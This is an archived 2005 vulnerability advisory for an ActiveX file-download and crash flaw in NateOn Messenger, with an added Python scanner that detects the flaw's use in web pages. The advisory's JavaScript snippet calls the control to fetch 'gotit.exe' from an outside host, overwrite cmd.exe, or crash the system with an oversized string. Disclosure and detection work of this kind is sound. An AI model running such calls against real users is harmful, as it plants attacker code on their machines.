Title: Arbitrary File Download by NateOn Messenger's ActiveX and DoS
Discoverer: PARK, GYU TAE (saintlinu@private)
Advisory No.: NRVA05-08
Critical: Moderately Critical
Impact: Arbitrary file download by NateOn Messenger's ActiveX and DoS
Where: From remote
Operating System: Windows Only
Solution: Not patched yet
Workaround: N/A

Notice:
09. 17. 2005 Initially notified
09. 23. 2005 2nd notified
09. 27. 2005 3rd notified
09. 29. 2005 Vendor didn't respond. Vulnerability disclosed.

Description:
NateOn Messenger (see NRVA05-02) is an Internet instant messenger such as MSN, Yahoo and so on.
If NateOn Messenger is installed, it can be exploited through the 'NateonDownloadManager.ocx' ActiveX control, and there is another vulnerability, like a buffer overflow.

See the following detailed description:

NOT INCLUDED HERE, BUT A PIECE OF CODE

<--snip-->
i = GotNate.IsNateonInstall();

if( i == 1 )
{
    alert('NateOn Messenger already installed. Do Attack ...');

    // if you want a second order attack then try
    i = GotNate.Excute("1",'http://saintlinu.null2root.org/gotit.exe','c:\\windows\\system32\\cmd.exe');

    // if you want to crash the victim system then try
    i = GotNate.Excute("1",'http://saintlinu.null2root.org/gotit.exe','very_long_strings_in_here');
}
else
{
    alert('NateOn Messenger NOT Installed');
}
</--snip-->
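A defensive check that follows from the snippet above, as an added example that is not part of the original advisory: it scans page source for script calls to the control's `Excute` method and reports those that fetch from a remote URL, write to an absolute local path, or pass an oversized third argument. The argument roles (second = source URL, third = local target), the 260-character threshold and the sample page (host `example.invalid`) are assumptions.

```python
import re

# JavaScript string literals, single- or double-quoted, with backslash escapes.
SQ = r"'(?:\\.|[^'\\])*'"
DQ = r'"(?:\\.|[^"\\])*"'
STR = f"(?:{SQ}|{DQ})"

# A call to the method named in the advisory, with literal string arguments.
CALL_RE = re.compile(rf"\.\s*Excute\s*\(\s*({STR}(?:\s*,\s*{STR})*)\s*\)", re.S)

def scan(page_source, max_target_len=260):
    """Return one finding per suspicious Excute(...) call in page_source."""
    findings = []
    for call in CALL_RE.finditer(page_source):
        # Strip the quotes and undo JavaScript's doubled backslashes.
        args = [m.group(0)[1:-1].replace("\\\\", "\\")
                for m in re.finditer(STR, call.group(1))]
        if len(args) < 3:
            continue
        url, target = args[1], args[2]  # assumed roles, inferred from the snippet
        reasons = []
        if re.match(r"(?i)^(?:https?|ftp)://", url):
            reasons.append("remote-source")
        if re.match(r"(?i)^(?:[a-z]:\\|\\\\)", target):
            reasons.append("absolute-local-target")
        if len(target) > max_target_len:  # assumed threshold (Windows MAX_PATH)
            reasons.append("oversized-argument")
        if reasons:
            findings.append({"url": url, "target": target, "reasons": reasons})
    return findings

# Constructed sample page, modelled on the advisory's snippet.
SAMPLE_PAGE = r'''
<script>
if (ctl.IsNateonInstall() == 1) {
  ctl.Excute("1", 'http://example.invalid/a.exe', 'c:\\windows\\system32\\cmd.exe');
  ctl.Excute("1", 'http://example.invalid/a.exe', 'LONGARG');
}
</script>
'''.replace("LONGARG", "A" * 1000)

if __name__ == "__main__":
    for finding in scan(SAMPLE_PAGE):
        print(finding["reasons"], finding["url"], finding["target"][:40])
```

The scanner only sees literal string arguments; calls whose arguments are built at run time need script emulation or proxy-side inspection of the rendered page.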
This archive was generated by hypermail 2.1.3 : Thu Sep 29 2005 - 08:54:29 PDT